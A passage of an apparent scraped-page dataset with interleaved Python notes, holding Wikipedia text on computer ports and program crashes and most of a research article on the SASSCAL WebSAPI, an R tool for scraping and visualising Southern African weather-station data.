Related news coverage: Linking Patent Goes to Court, Reuters, February 7, 2002; Bigger Not Better With Copyrighted Web Photos, Brenda Sandburg, The Recorder, February 7, 2002; Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001; Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001; Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001. Related resources: Links and Law, Tim Berners-Lee (personal view); Kelly v. Arriba Soft, 9th Circuit Court of Appeals (case); The Link Controversy Page, Stefan Bechtold (reference); Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case); Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief). |
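The Robots Exclusion convention described in the FAQ above can be honoured from Python with the standard library's urllib.robotparser before fetching any page with this notebook's scraper. A minimal sketch, using placeholder site and user-agent values:

from urllib import robotparser

rp = robotparser.RobotFileParser()
rp.set_url("https://example.com/robots.txt")   # placeholder site
rp.read()

user_agent = "MyScraperBot"                     # placeholder user agent
target = "https://example.com/some/page.html"
if rp.can_fetch(user_agent, target):
    print("robots.txt allows fetching", target)
else:
    print("robots.txt disallows fetching", target)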
205 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_port_(hardware) | A computer port is a hardware piece on a computer where an electrical connector can be plugged to link the device to external devices, such as another computer, a peripheral device or network equipment. 1 This is a non-standard term. Electronically, the several conductors where the port and cable contacts connect, provide a method to transfer data signals between devices. Bent pins are easier to replace on a cable than on a connector attached to a computer, so it was common to use female connectors for the fixed side of an interface. Computer ports in common use cover a wide variety of shapes such as round (PS 2, etc.), rectangular (FireWire, etc.), square (Telephone plug), trapezoidal (D-Sub — the old printer port was a DB 25), etc. There is some standardization to physical properties and function. For instance, most computers have a keyboard port (currently a Universal Serial Bus USB-like outlet referred to as USB Port), into which the keyboard is connected. Physically identical connectors may be used for widely different standards, especially on older personal computer systems, or systems not generally designed according to the current Microsoft Windows compatibility guides. For example, a 9 pin D-subminiature connector on the original IBM PC could have been used for monochrome video, color analog video (in two incompatible standards), a joystick interface, or a MIDI musical instrument digital control interface. The original IBM PC also had two identical 5 pin DIN connectors, one used for the keyboard, the second for a cassette recorder interface; the two were not interchangeable. The smaller mini-DIN connector has been variously used for the keyboard and two different kinds of mouse; older Macintosh family computers used the mini-DIN for a serial port or for a keyboard connector with different standards than the IBM-descended systems. Electronically, hardware ports can almost always be divided into two groups based on the signal transfer: After ports are connected, they typically require handshaking, where transfer type, transfer rate, and other necessary information is shared before data is sent. Hot-swappable ports can be connected while equipment is running. Almost all ports on personal computers are hot-swappable. Plug-and-play ports are designed so that the connected devices automatically start handshaking as soon as the hot-swapping is done. USB ports and FireWire ports are plug-and-play. Auto-detect or auto-detection ports are usually plug-and-play, but they offer another type of convenience. An auto-detect port may automatically determine what kind of device has been attached, but it also determines what purpose the port itself should have. For example, some sound cards allow plugging in several different types of audio speakers; then a dialogue box pops up on the computer screen asking whether the speaker is left, right, front, or rear for surround sound installations. The user's response determines the purpose of the port, which is physically a 1 8" tip-ring-sleeve mini jack. Some auto-detect ports can even switch between input and output based on context. As of 2006, manufacturers have nearly standardized colors associated with ports on personal computers, although there are no guarantees. The following is a short list: Additionally, USB ports are color-coded according to the specification and data transfer speed, e.g. 
USB 1.x and 2.x ports are usually white or black, and USB 3.0 ones are blue. SuperSpeed connectors are teal in color. 2 FireWire ports used with video equipment (among other devices) can be either 4 pin or 6 pin. The two extra conductors in the 6 pin connection carry electrical power. This is why a self-powered device such as a camcorder often connects with a cable that is 4 pins on the camera side and 6 pins on the computer side, the two power conductors simply being ignored. This is also why laptop computers usually have only 4 pin FireWire ports, as they cannot provide enough power to meet requirements for devices needing the power provided by 6 pin connections. Optical (light) fiber, microwave, and other technologies (i.e., quantum) have different kinds of connections, as metal wires are not effective for signal transfers with these technologies. Optical connections are usually a polished glass or plastic interface, possibly with an oil that lessens refraction between the two interface surfaces. Microwaves are conducted through a pipe, which can be seen on a large scale by examining microwave towers with "funnels" on them leading to pipes. Hardware port trunking (HPT) is a technology that allows multiple hardware ports to be combined into a single group, effectively creating a single connection with a higher Bandwidth sometimes referred to as a double-barrel approach. This technology also provides a higher degree of fault tolerance because a failure on one port may just mean a slow-down rather than a dropout. By contrast, in software port trunking (SPT), two agents (websites, channels, etc.) are bonded into one with the same effectiveness; i.e., ISDN B1 (64K) plus B2 (64K) equals data throughput of 128K. The USB-C standard, published in 2014, supersedes previous connectors and is reversible (although not electrically), meaning it can be plugged both ways. Reversible plugs have a symmetric pinout. Other reversible connectors include Apple's Lightning. 3 4 5 |
206 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Program_crash | In computing, a crash, or system crash, occurs when a computer program such as a software application or an operating system stops functioning properly and exits. On some operating systems or individual applications, a crash reporting service will report the crash and any details relating to it (or give the user the option to do so), usually to the developer(s) of the application. If the program is a critical part of the operating system, the entire system may crash or hang, often resulting in a kernel panic or fatal system error. Most crashes are the result of a software bug. Typical causes include accessing invalid memory addresses, an incorrect address value in the program counter, buffer overflow, overwriting a portion of the affected program code due to an earlier bug, executing invalid machine instructions (an illegal or unauthorized opcode), or triggering an unhandled exception. The original software bug that started this chain of events is typically considered to be the cause of the crash, which is discovered through the process of debugging. The original bug can be far removed from the code that actually triggered the crash. In early personal computers, attempting to write data to hardware addresses outside the system's main memory could cause hardware damage. Some crashes are exploitable and let a malicious program or hacker execute arbitrary code, allowing the replication of viruses or the acquisition of data which would normally be inaccessible. An application typically crashes when it performs an operation that is not allowed by the operating system. The operating system then triggers an exception or signal in the application. Unix applications traditionally responded to the signal by dumping core. Most Windows and Unix GUI applications respond by displaying a dialogue box with the option to attach a debugger if one is installed. Some applications attempt to recover from the error and continue running instead of exiting. An application can also contain code to crash after detecting a severe error. Typical errors that result in application crashes include: A "crash to desktop" is said to occur when a program (commonly a video game) unexpectedly quits, abruptly taking the user back to the desktop. Usually, the term is applied only to crashes where no error is displayed, hence all the user sees as a result of the crash is the desktop. Many times there is no apparent action that causes a crash to desktop. During normal function, the program may freeze for a shorter period of time, and then close by itself. Also during normal function, the program may display a black screen and repeatedly play the last few seconds of sound (depending on the size of the audio buffer) that was being played before it crashes to desktop. Other times it may appear to be triggered by a certain action, such as loading an area. Crash to desktop bugs are considered particularly problematic for users. Since they frequently display no error message, it can be very difficult to track down the source of the problem, especially if the times they occur and the actions taking place right before the crash do not appear to have any pattern or common ground. One way to track down the source of the problem for games is to run them in windowed mode. Windows Vista has a feature that can help track down the cause of a CTD problem when it occurs on any program.
Windows XP included a similar feature as well. Some computer programs, such as StepMania and BBC's Bamzooki, also crash to desktop if in full-screen, but display the error in a separate window when the user has returned to the desktop. The software running the web server behind a website may crash, rendering it inaccessible entirely or providing only an error message instead of normal content. For example: if a site is using an SQL database (such as MySQL) for a script (such as PHP) and that SQL database server crashes, then PHP will display a connection error. An operating system crash commonly occurs when a hardware exception occurs that cannot be handled. Operating system crashes can also occur when internal sanity-checking logic within the operating system detects that the operating system has lost its internal self-consistency. Modern multi-tasking operating systems, such as Linux and macOS, usually remain unharmed when an application program crashes. Some operating systems, e.g., z/OS, have facilities for Reliability, availability and serviceability (RAS) and the OS can recover from the crash of a critical component, whether due to hardware failure, e.g., uncorrectable ECC error, or to software failure, e.g., a reference to an unassigned page. An Abnormal end or ABEND is an abnormal termination of software, or a program crash. Errors or crashes on the Novell NetWare network operating system are usually called ABENDs. Communities of NetWare administrators sprang up around the Internet, such as abend.org. This usage derives from the ABEND macro on IBM OS/360, ..., z/OS operating systems. Usually capitalized, but may appear as "abend". Some common ABEND codes are System ABEND 0C7 (data exception) and System ABEND 0CB (division by zero). 1 2 3 Abends can be "soft" (allowing automatic recovery) or "hard" (terminating the activity). 4 The term is jocularly claimed to be derived from the German word "Abend" meaning "evening". 5 Depending on the application, the crash report may contain the user's sensitive and private information. 6 Moreover, many software bugs which cause crashes are also exploitable for arbitrary code execution and other types of privilege escalation. 7 8 For example, a stack buffer overflow can overwrite the return address of a subroutine with an invalid value, which will cause, e.g., a segmentation fault, when the subroutine returns. However, if an exploit overwrites the return address with a valid value, the code in that address will be executed. When crashes are collected in the field using a crash reporter, the next step for developers is to be able to reproduce them locally. For this, several techniques exist: STAR uses symbolic execution, 9 EvoCrash performs evolutionary search. 10 |
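The crash and unhandled-exception behaviour described above matters for scraping scripts too: one bad URL raising an exception will terminate the whole run unless it is caught, while handling it lets the loop degrade gracefully. A minimal sketch with placeholder URLs:

import requests

urls = ["https://example.com/ok", "https://example.com/missing"]   # placeholders

for url in urls:
    try:
        resp = requests.get(url, timeout=10)
        resp.raise_for_status()          # raises requests.HTTPError on 4xx/5xx
        print(url, "->", len(resp.text), "bytes")
    except requests.RequestException as exc:
        # Handled here, so one failing page does not crash the entire scrape
        print(f"Skipping {url}: {exc}")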
207 | https://en.wikipedia.org/wiki/Web_scraping | https://doi.org/10.5334%2Fdsj-2021-024 | The Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated to support regional weather monitoring and climate research in Southern Africa. As a result, several Automatic Weather Stations (AWSs) were implemented to provide numerical weather data within the collaborating countries. Meanwhile, access to the SASSCAL weather data is limited to a number of records that are achieved via a series of clicks. Currently, end users can not efficaciously extract the desired weather values. Thus, the data is not fully utilised by end users. This work contributes with an open source Web Scraping Application Programming Interface (WebSAPI) through an interactive dashboard. The objective is to extend functionalities of the SASSCAL Weathernet for: data extraction, statistical data analysis and visualisation. The SASSCAL WebSAPI was developed using the R statistical environment. It deploys web scraping and data wrangling techniques to support access to SASSCAL weather data. This WebSAPI reduces the risk of human error, and the researcher’s effort of generating desired data sets. The proposed framework for the SASSCAL WebSAPI can be modified for other weather data banks while taking into consideration the legality and ethics of the toolkit. Meteorological weather data are useful in filling information needs in academia and industrial settings. The information generated from these data at local levels is useful in complementing: hydrological models (Schuol Abbaspour 2007), high impact weather predictions models (Chang et al. 2013), and simulations of heavy rainfall events (Bopape et al. 2021, Molongwane et al. 2020, Somses et al. 2020) and heatwaves (Moses 2017). Moreover, weather data are also vital for agro-meteorological operations, as well as in efficacious planning of construction and recreational activities. Although there is a huge need of weather or climatological data for Southern Africa, various institutions and enterprises like BIUST, SASSCAL1 and WASCAL2 have introduced AWSs to monitor weather events at finer intervals. However, most of AWSs installed in developing countries are underutilized. For instance, the Botswana Department of Meteorological Services (BDMS)’s mandate is to provide quality weather, climate information and services to enable informed decision making for sustainable socio-economic development in scenarios related to weather and climate. Meanwhile, the BDMS lacks a designated online platform (currently relies on radio stations, television and a Facebook page) to disseminate weather information to the public. On a related note, BIUST identified “Climate and Society” as one of its thematic areas3 of focus. This is geared towards enhancing services related to: climate and impact modeling; early warning, and disaster management for weather and climate change. In 2016, BIUST installed an AWS equipped with a local machine running XConnect for data logging of historical weather data. Likewise, this particular AWS also lacks the backend service layer for dissemination of weather outputs to end users. All these can be seen as barriers and hence limitations of access to the generated weather data. For instance, to request data, clients have to go through some hectic processes. In the case of BIUST, clients have to request data using email, or copy it from the officers using physical storage devices like memory cards. 
In the case of BDMS, end users download and complete a form;4 they then submit it to BDMS. The service time is three days. It is irrefutable that the demand for climatological data in Southern Africa invites key stakeholders (i.e., researchers and developers) and organisations to implement platforms that facilitate easy access and visualisation of climate data. As a result, the Southern African Science Service Centre for Climate and Land Management (SASSCAL) was initiated (Helmschrot et al. 2015) to support regional weather monitoring and climate research in Southern Africa (Muche et al. 2018). The SASSCAL Weathernet5 disseminates near-real-time data from AWSs at hourly intervals, including aggregated daily and monthly data (see Figure 1). Figure 1: Visualisation of AWS data via the SASSCAL Weathernet. The SASSCAL weather data is reviewed for quality control before dissemination (Kaspar et al. 2015). These data can also be integrated with data from different sources for research purposes. For instance, Moses et al. (Oliver and Hambira 2018) merged it with other meteorological data from the BDMS to analyse the effects of solar radiation, wind speed and humidity on evapo-transpiration around the Okavango Delta. Similarly, predictive data analysis and modeling of temperature patterns (Thapelo 2014, Thapelo and Jamisola 2019) is vital in the understanding of heatwaves (Moses 2017), while rainfall values can help in assessing rainfall erosivity (Singh and Singh 2020). Despite the distinct potential use of the SASSCAL weather data, there is a burden on end users to access, download and use such data in research (see Figure 2). First, the user has to navigate to the SASSCAL Weathernet to identify a country, the AWS of interest, and the temporal resolution of the weather data. The user can then manually copy and paste the whole data set into a storage file for data analysis. There is an option to download the SASSCAL weather data in Excel format only. However, there is no option to select only the desired weather values from the AWSs of interest. Even after downloading the weather data, end users face the challenge of generating clean data sets containing the desired variables for further use. The situation worsens when extracting finer temporal data from multiple AWSs across the entire region. Figure 2: Manually extracting data from the SASSCAL Weathernet. This process is costly, time-consuming and error-prone. This work presents the SASSCAL Web Scraping Application Programming Interface (WebSAPI). Web scraping (Munzert et al. 2014) is a data science technique that deploys scripts for the extraction of structured data from websites. A script is a computer program that automates a specific task using a selected programming language like R or Python. Thus, a WebSAPI can be seen as an application service that allows access to online data for further use in research projects. By digitalising the BDMS’ form in footnote 4 for climate data requests, this work enables end users to efficaciously (1) access and visualise weather data from the SASSCAL Weathernet; and (2) download desired data for use in data driven projects. The structure of the work is as follows. 
Section II provides brief background information for this work. Section III presents the approach deployed in the development of the SASSCAL WebSAPI. Section IV presents results. It also illustrates how the SASSCAL WebSAPI can be used to support the extraction of weather variables, as well as the visualisation and dissemination of the generated outputs. Lastly, sections V and VI present discussions and conclusions. Most African countries (Tufa et al. 2014), like Botswana (Nkemelang et al. 2018), lag behind in terms of climate informatics (Vyacheslav et al. 2019) and environmental data science (Gibert et al. 2018, Vyacheslav et al. 2019). This can be attributed to a lack of readily available platforms and data, as also pointed out in (Schuol and Abbaspour 2007, Tufa et al. 2014). All these bottlenecks can be unlocked by integrating computing technologies like web scraping and dashboard applications. Web scraping techniques have been widely deployed in a number of projects from different disciplines such as economics (Robert and Paul 2020) and climate science (Yang et al. 2010). Regardless of the discipline, the general idea is to allow greater visibility, access, extraction and usability of the online data. This work contributes by addressing the second “pillar” of the Global Framework for Climate Services (Vaughan et al. 2016) using climate informatics. This WebSAPI is motivated by the authors of (Bonifacio et al. 2015), who presented a free tool for automated extraction and consolidation of climate data from different online web data banks. Similar work by Yang et al. (Yang et al. 2010) presented a system with functionalities for scraping, filtering and visualising climatic data for easy use. This work is related to (Sitterson et al. 2020) regarding the user API for data requests. It is also related to (Bonifacio et al. 2015) in that it deconstructs the URL for a given station and then modifies the date range and the desired temporal resolution to extract the desired weather data. Web scraping is still emerging, with no dominant standards at present. This technology also presents a combination of ethical and legal challenges (Krotov et al. 2020, Mason 1986) that necessitates standards to support data exchange. The ethical issues attached to web scraping can be summed up into four generic groups: property, privacy, accessibility and accuracy (Mason 1986). Web scrapers can also compete with the main data provider APIs, which might diminish the value of the organisation’s intended mission (Hirschey 2014). For instance, if a web scraper attracts more clients than the intended main API, then end users might end up neglecting the platform of that organisation. All these invite multi-disciplinary collaboration (i.e., government sectors, academia and industrial practitioners) to establish standards and boundaries for technology usage. This could irrefutably catalyse the development and adoption of the generated data driven outputs, as also supported in (Fundel et al. 2019, Katz and Murphy 2005). The first task was to identify the data sources, and the SASSCAL Weathernet came to the rescue. The aim of the SASSCAL WebSAPI is to improve data accessibility and visualisation of the SASSCAL weather data before data analysis and predictive modeling. The target of this work was to develop and implement independent algorithms that can, later on, be consolidated and integrated into a package for data driven projects requiring SASSCAL weather data. 
The SASSCAL WebSAPI comprises modularised algorithms packaged into scripts to enable direct control of the weather data provided by the SASSCAL Weathernet. These include, but are not limited to, algorithms targeted at: processing the SASSCAL Weathernet link; determining the pages containing relevant weather data; deconstructing and parsing contents of the HTML file; extracting required weather data from selected pages; combining data (i.e., data wrangling) into data frames to generate data sets and visuals; as well as sharing the generated outputs using interactive dashboards. The SASSCAL Weathernet enables the public to use one domain to access the AWS data. Each SASSCAL member country has various AWSs, each with a unique identifier (ID). Access to the data is defined using the same abstract pattern. In essence, one can query the website’s database for any AWS within the SASSCAL region by providing the corresponding URL. Thus, one can extract the weather data via a tailored API using formats like HTML and XML. The home page URL for each SASSCAL AWS is defined by x/y?z, where x is the preamble in link 5; y is the weatherstat_AO_we.php token that defines the weather statistics for a given resolution (monthly, daily or hourly); and z is the string describing the logger ID (loggerid_crit=n), where n is the AWS’ unique ID (a minimal Python sketch of this URL pattern appears after this passage). Tables containing relevant data are found by trial and error (i.e., by inspecting individual elements of the SASSCAL Weathernet page), or by simply exploring the source code of the web page. This work deploys the workflow depicted in Figure 3 following the data science approach in (Bradley and James 2019, Hadley and Garrett 2016) using open-source platforms (i.e., R version 4.0.3 and RStudio 1.1.463). Thus, the algorithms are coded in R, and the functions are tested using RMarkdown, which facilitates reproducibility. R has excellent packages for statistical data science and visualisation. Table 1 shows the packages deployed in this work. Figure 3: Workflow of the SASSCAL WebSAPI. Table 1: R packages proposed in this work. A helper function (helper.R) is scripted to install and load the packages included in Table 1. The rvest package (Wickham and Wickham 2016) is required for web scraping, while the XML package (Lang and Lang 2015) is required for XML document processing. The ggplot2 package (Wickham 2011) is used for data visualisation. The Shiny (Chang et al. 2015) and Flexdashboard (Allaire 2017) packages are used to design the WebSAPI’s dashboard. The htmlwidgets framework is deployed to provide high-level R bindings to the JavaScript libraries for data visualization. All these functions are embedded in a reproducible RMarkdown document to implement the proposed SASSCAL WebSAPI. The data driven pipeline used in this work is summarised in Figure 3. Algorithm 1 implements an interactive map to visualise where the AWSs are located geographically. Here, w is a vector of AWSs for a given country, x and y are vectors of the latitude and longitude coordinates of the AWSs, and z is a vector detailing the descriptions of a given AWS. The algorithm also allows users to select specific AWSs, thanks to the leaflet package. In Algorithm 1, the data frame c’ defining the inputs is piped into the leaflet function to automatically generate an auto-sized map that fits the markers of all AWSs. This function also adds some bounds (Line 4) so that the user cannot scroll too far away from the markers of the AWSs. The interactive map pops up the name of the AWS as the user hovers the mouse over a marker. 
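The URL pattern and page layout described above lend themselves to a scripted fetch. Since this notebook already works in Python with requests and pandas, the following is a minimal Python sketch of that idea rather than the paper's R code; the base domain comes from the article's footnotes, while the resolution token (reconstructed here as weatherstat_AO_we.php), the loggerid_crit parameter name, the build_station_url helper and the example logger ID are assumptions for illustration.
# Minimal sketch (assumptions noted above): build a SASSCAL-Weathernet-style URL from
# its three parts (preamble x, resolution token y, logger-ID query z), then list every
# HTML table in the returned page so the table of interest can be located by inspection.
import requests
import pandas as pd
from io import StringIO

def build_station_url(base, resolution_token, logger_id):
    # x/y?z as described in the text, e.g. <base>/weatherstat_AO_we.php?loggerid_crit=<n>
    return f"{base}/{resolution_token}?loggerid_crit={logger_id}"

url = build_station_url("http://www.sasscalweathernet.org",  # preamble x (from footnote 5)
                        "weatherstat_AO_we.php",             # resolution token y (reconstructed name)
                        "12345")                             # AWS logger ID n (hypothetical)
html = requests.get(url, timeout=30).text
tables = pd.read_html(StringIO(html))                        # parse every <table> in the DOM
print(f"{len(tables)} tables found")
for i, table in enumerate(tables):
    print(i, table.shape)                                    # inspect shapes to spot the data table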
This simple functionality is crucial for end users (i.e., researchers) since it provides spatio-visual exploration of the AWSs that are supported by the SASSCAL Weathernet. Algorithm 1: Visualise the AWSs of a given country. The web scraping functionality in Algorithm 2 uses the All_AWS_ID.R script to construct vectors that store the names and IDs of the AWSs. The AWS ID Getter function assigns an AWS name (i.e., “x”) to its corresponding ID (i.e., “value”) using a hash map (see Lines 7 and 8). Thus, to find the ID for a given AWS of interest, the function looks it up in the hash map and retrieves that AWS’ ID. Algorithm 2: Data scraper. The AWS name, ID and date are then used to construct a URL used to fetch the data by the DataHarvester.R function in Algorithm 3. The DataHarvester takes in a URL to a given AWS. The URL string can be partitioned into tokens (i.e., using just the AWS name and date) to facilitate easy input. Algorithm 3: Data harvesting. The XML package (Lang and Lang 2013) was used to parse a given URL and create a Document Object Model (DOM). The readHTMLTable() function from this package is used to select the weather data from the HTML tables in the SASSCAL Weathernet. The number of tables for a given DOM was determined using R’s built-in length() function. There are three DOM instances, one for each temporal resolution, each with multiple tables. There are 14 tables in the DOM corresponding to the web page with hourly data, and the values of interest are in the 13th table. The DOM for the web page with daily observations has 13 tables, and the daily values of interest are in the 12th table. The last DOM has 18 tables, with the monthly data contained in the 10th table. Line 3 in Algorithm 3 facilitates the cleaning and selection of the desired weather tables using a table-index parameter (i.e., 13, 12 or 10 as discussed above); a second parameter defines the extensions that fix the columns of the table to be visualised, while a third defines extra options for buttons that allow end users to search, scroll, copy and download the weather data visualised via the table. The DataWrangler() function was implemented to iterate through the table containing the dates of observations. It uses a date-range argument to determine the date range for the data of interest. The extracted weather data is then unified into a single data frame to generate data sets for further use, as illustrated in Figures 4 and 5 in section IV (a Python sketch of this table-selection and date-filtering step appears after this passage). Figure 4: Visualising Botswana AWSs using Algorithm 1. Figure 5: Screenshot of the SASSCAL WebSAPI for capturing user input when requesting weather data. The GUI allows end users to select the geographical location of interest (i.e., Botswana), the temporal resolution, the AWS of interest and the downloading of data. The functionality of multi-input selection of AWSs provides end users with a feedback mechanism that notifies them about the selected AWSs, as seen on the tab titled “Currently Selected AWS”. This is quite useful for a quick exploration of geographic locations before downloading data. Algorithm 4 implements functionalities for the dashboard page. These include the dashboardHeader() to define the title, and the dashboardSidebar() to define two functionalities for visualising the tables of numerical weather data from an AWS of a given country. The dashboardBody() facilitates selection of the AWS, the resolution, the date range, the use of the data, and the weather values, as well as the functionality to export data. Since different end users have different user needs, this work does not develop a complete GUI. 
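The fixed table positions reported above (hourly data in the 13th table, daily in the 12th, monthly in the 10th) and the date-range filtering done by DataWrangler() are concrete enough to sketch. The paper implements this in R with readHTMLTable(); below is a hedged Python analogue for this notebook, operating on the tables list produced by pd.read_html in the previous sketch. The harvest function name and the 'Date' column name are assumptions, and the indices are shifted to 0-based positions.
# Python analogue of the table-selection and date-filtering step described above.
# The 13th/12th/10th tables from the text become indices 12/11/9 once 0-based.
import pandas as pd

TABLE_INDEX = {"hourly": 12, "daily": 11, "monthly": 9}  # 0-based positions of the data tables

def harvest(tables, resolution, start, end, date_col="Date"):
    df = tables[TABLE_INDEX[resolution]].copy()          # pick the table of interest
    df[date_col] = pd.to_datetime(df[date_col], errors="coerce")
    mask = df[date_col].between(start, end)              # keep only the requested date range
    return df.loc[mask].reset_index(drop=True)

# Example usage with the 'tables' list from the previous sketch:
# daily = harvest(tables, "daily", "2020-01-01", "2020-03-31")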
Interested readers should see (Robert and Paul 2020) for completing a dashboard API. Algorithm 4: Dashboard design for dissemination. This work documents the development process of a lightweight WebSAPI capable of extracting and displaying timely weather data based on the SASSCAL Weathernet. The WebSAPI is cost-effective since it is powered by open-source technologies. Besides the functionalities for extracting numerical data, the WebSAPI’s tasks were expanded to include visuals using other formats like tables, maps, and charts. Figure 4 shows an interactive map generated using Algorithm 1. The interactive map can pop up the name of the AWS as the user hovers the mouse over a marker. The algorithms defined in section III-E only scrape data from one AWS at a time. These can be extended by adding functionality to specify multiple AWSs and then using a for loop to scrape the desired weather data, as shown in Figure 6 (a short Python sketch of this loop appears after this passage). Figure 6: Screenshot of the SASSCAL WebSAPI’s GUI for data request, visualisation and extraction of data. In addition to selecting the desired AWS, temporal resolution, and date range, the SASSCAL WebSAPI’s GUI allows end users to select the desired variables. In this work, a data driven template was developed in the form of a WebSAPI to facilitate efficacious interaction with the outputs generated by the SASSCAL Weathernet. The SASSCAL WebSAPI implements modularised algorithms to collect the SASSCAL weather data and generate high-quality data sets that can be used in data driven projects. Modularised scripts facilitate an efficient product design process that integrates efforts related to idea generation, concept development, and modification of existing systems and platforms to develop proper solutions. This section presents discussions regarding the data quality, legal aspects, limitations and implications of the proposed WebSAPI. The SASSCAL Weathernet data is checked for quality control as mentioned in (Kaspar et al. 2015). This gives an “assurance” that the SASSCAL WebSAPI will provide quality data that would not mislead end users (i.e., researchers or decision makers). However, users should note that due to occasional sensor faults, the correctness of data values cannot be fully guaranteed, as also indicated in the SASSCAL Weathernet.6 The declaration on SASSCAL data use indicates that free use is granted for non-commercial and educational purposes. Although there are no explicit restrictions on data scraping on the SASSCAL Weathernet, it is difficult to conclude that SASSCAL encourages end users to automatically scrape and extract data using tailor-made APIs. This can be justified by the note “For data requests regarding specific countries, stations, time periods or specific sensors please contact oadc-datarequest@sasscal.org” shown in footnote 7. It should be noted that the underlined aspects are the challenges proposed to be addressed through this work. Thus, personal APIs that programmatically extract the weather data by bypassing the designated SASSCAL Weathernet API can be seen as presenting a slight ethical dilemma for developers. The main hurdle relates to identifying and integrating appropriate data driven technologies to facilitate flexible access and visualisation of the SASSCAL weather data. In this regard, a couple of algorithms have been completed and tested to optimise the task of web scraping. However, the task of retrieving weather data was tested using a relatively small dataset (94 instances). 
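The multi-AWS extension mentioned above (looping over several stations instead of one) can be sketched in a few lines. This reuses the hypothetical build_station_url and harvest helpers from the earlier sketches, uses placeholder logger IDs, and adds a small delay between requests so the scraping stays polite toward the SASSCAL servers, a concern the next passage raises.
# Sketch of the for-loop extension: harvest several AWSs and stack the results.
import time
import requests
import pandas as pd
from io import StringIO

station_ids = ["12345", "23456", "34567"]   # hypothetical AWS logger IDs
frames = []
for sid in station_ids:
    url = build_station_url("http://www.sasscalweathernet.org",
                            "weatherstat_AO_we.php", sid)        # helper from the earlier sketch
    tables = pd.read_html(StringIO(requests.get(url, timeout=30).text))
    df = harvest(tables, "daily", "2020-01-01", "2020-03-31")    # helper from the earlier sketch
    df["station_id"] = sid                                       # record the source AWS
    frames.append(df)
    time.sleep(2)                                                # rate-limit between requests

combined = pd.concat(frames, ignore_index=True)                  # one data set across all AWSs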
The small data set was chosen to ensure that the automatic scraping and retrieval of data is unlikely to damage or slow down the SASSCAL website’s servers. This toolkit is built on top of the SASSCAL Weathernet. Thus, changes in the structural representation of the SASSCAL Weathernet imply modifying the WebSAPI. There is no free lunch in problem solving. The process of web scraping and dashboard design is iterative and evolutionary. The integration of R, flexdashboard and Shiny allows the development and deployment of interactive apps. However, before starting a web-scraping-based data driven project, developers should begin by analysing the associated legality and ethics (Krotov et al. 2020, Mason 1986) to avoid possible bottlenecks. The contribution of this work is pragmatic rather than theoretical. The WebSAPI is flexible and reproducible, with potential to be scaled up (expanded) to address other functionalities related to the use of SASSCAL weather data. Reproducibility is an important aspect in open science research and API development. This helps to reduce the time taken for data collection, development and testing, since the independent components (algorithms) have already been tried and tested. This approach has the potential to catalyse the development of packages from existing platforms to meet end-user requirements. It should be noted that neither the BDMS nor BIUST has an API to disseminate weather information. This WebSAPI is still under development, yet it has the potential to be adapted and incorporated into the portals of weather service providers (BIUST, BDMS, SASSCAL, and WASCAL) to bridge gaps in weather and climate data access. Developing and implementing a data driven platform to serve end users is a challenging task that requires input from multidisciplinary stakeholders. This work integrated web scraping (Munzert et al. 2014), data wrangling and dashboard techniques to develop a lightweight SASSCAL WebSAPI. In comparison to previous web scraping literature, this work takes into consideration that data driven outputs need to be disseminated to end users. In this case, a dashboard prototype was developed in RMarkdown to facilitate reproducibility. The WebSAPI is expected to create new channels to extend the services of the SASSCAL Weathernet. By enabling efficacious and efficient data access, the SASSCAL WebSAPI has the potential to increase the productivity and quality of data driven projects that make use of SASSCAL weather data. The SASSCAL WebSAPI should be seen not as a replacement but rather as a complementary toolkit to the SASSCAL Weathernet. It does not cover all the tasks related to “weather data science”, but it provides the end-user community with the opportunity to reproduce it and develop in-depth product development skills to ultimately add more functionalities to a related API. In terms of extending this work, more end-user driven functionalities will be added to this API to enable data driven operations and services, such as investigating strategies for imputation of missing data, and modelling. Collaboration with the concerned stakeholders (i.e., SASSCAL, BDMS, BIUST), including end users (researchers, students, and farmers), could catalyse the development and deployment process. This will surely enhance operational productivity while maximizing utilization of these open-source technologies. 
Efforts from this work are likely to spawn new projects and collaboration that will better inform citizens, continue to help them make use of the generated data, and contribute to the open-data community. This R based toolkit is still under development. Parallel to this manuscript is a reproducible tutorial in RMarkdown, integrating Shiny and Flexdashboard for visualisation and dissemination of outputs. The tutorial and code are available on https://github.com/EL-Grande/SASSACL-WebSAPI and the data is available online (footnote 5). Footnotes: 1. https://www.sasscal.org/. 2. https://wascal.org/. 3. www.biust.ac.bw/research/thematic-areas-platforms. 4. https://www.gov.bw/natural-resources/request-climatological-data. 5. http://www.sasscalweathernet.org/. 6. http://www.sasscalweathernet.org/imprint_we.php. 7. http://www.sasscalweathernet.org/contact_we.php. BIUST: for the partial financial support (with reference number: S 00086); and SASSCAL for availing the data. The authors have no competing interests to declare. Thapelo TS: Conceptualization, Methodology, Resources, Application Development, Writing (Original Draft Preparation; Review and Editing); Namoshe M: Conceptualization, Resources, Formal Analysis, Review and Editing; Matsebe O: Conceptualization, Resources, Formal Analysis, Review and Editing; Motshegwa T: Resources, Formal Analysis, Review and Editing; Bopape MJM: Resources, Formal Analysis, Review and Editing. Allaire, J. 2017. Flexdashboard: R markdown format for flexible dashboards. Bonifacio, C, Barchyn, TE, Hugenholtz, CH and Kienzle, SW. 2015. CCDST: A free Canadian climate data scraping tool. Computers & Geosciences, 75: 13–16. DOI: https://doi.org/10.1016/j.cageo.2014.10.010 Bopape, M-JM, Waitolo, D, Plant, RS, Phaduli, E, Nkonde, E, Simfukwe, H, Mkandawire, S, Rakate, E and Maisha, R. 2021. Sensitivity of Simulations of Zambian Heavy Rainfall Events to the Atmospheric Boundary Layer Schemes. Climate, 9(2): 38. DOI: https://doi.org/10.3390/cli9020038 Bradley, A and James, RJ. 2019. Web scraping using R. Advances in Methods and Practices in Psychological Science, 2(3): 264–270. DOI: https://doi.org/10.1177/2515245919859535 Chang, EK, Peña, M and Toth, Z. 2013. International research collaboration in high-impact weather prediction. Bulletin of the American Meteorological Society, 94(11): ES149–ES151. DOI: https://doi.org/10.1175/BAMS-D-13-00057.1 Chang, W, Cheng, J, Allaire, J, Xie, Y and 